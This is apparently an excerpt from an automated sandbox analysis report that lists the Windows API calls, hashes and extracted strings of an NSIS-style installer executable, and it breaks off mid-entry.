                                                                                                                                                                                                                                                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1912718029-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                                                    • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                                                                                                                                                    • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                                                                                                                                                    • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00830828), ref: 00402387
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3376005127-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                                                    • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2568930968-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                                                    • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                                                                                                                                                    • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1849352358-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                                                    • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                                                                    • String ID: !
                                                                                                                                                                                                                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                                                                    • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                                                    • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00404483
                                                                                                                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                                                                                    • String ID: %u.%u%s%s
                                                                                                                                                                                                                                                                                                    • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                                                                                                                                                    • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                                                                                                                                                    • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                                                                                                                                                    • API String ID: 1697273262-1764544995
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                                                                                                                                                    • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                                                                                                                                                    • API String ID: 2577523808-3778932970
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: lstrcatwsprintf
                                                                                                                                                                                                                                                                                                    • String ID: %02x%c$...
                                                                                                                                                                                                                                                                                                    • API String ID: 3065427908-1057055748
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                                    • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                                                                                                                                                    • API String ID: 2266616436-4211696005
                                                                                                                                                                                                                                                                                                    • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                                                                                                                                    • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                                                                                                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426976,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                    • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1599320355-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 2ae45dc5b744dabfc446a34129bb4571dfe0fe142ad68b921cc5a8ab1e19b1d4
                                                                                                                                                                                                                                                                                                    • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ae45dc5b744dabfc446a34129bb4571dfe0fe142ad68b921cc5a8ab1e19b1d4
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                                                    • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                                                                                                                                                                                    • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                                                                                                                                                                                    • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                                                                                                                                                    • String ID: Version
                                                                                                                                                                                                                                                                                                    • API String ID: 512980652-315105994
                                                                                                                                                                                                                                                                                                    • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                                                                                    • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                                                                                                                                                    • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2102729457-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                                                    • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2883127279-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                                                    • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                                                                                                                                                                                    • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                                                                                    • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                                                    • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                                                                                                                                                    • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                                                                                                                                                    • String ID: !N~
                                                                                                                                                                                                                                                                                                    • API String ID: 623250636-529124213
                                                                                                                                                                                                                                                                                                    • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                                                    • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • Error launching installer, xrefs: 00405C74
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                                                    • String ID: Error launching installer
                                                                                                                                                                                                                                                                                                    • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                                                                                    • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                                                    • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                    • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
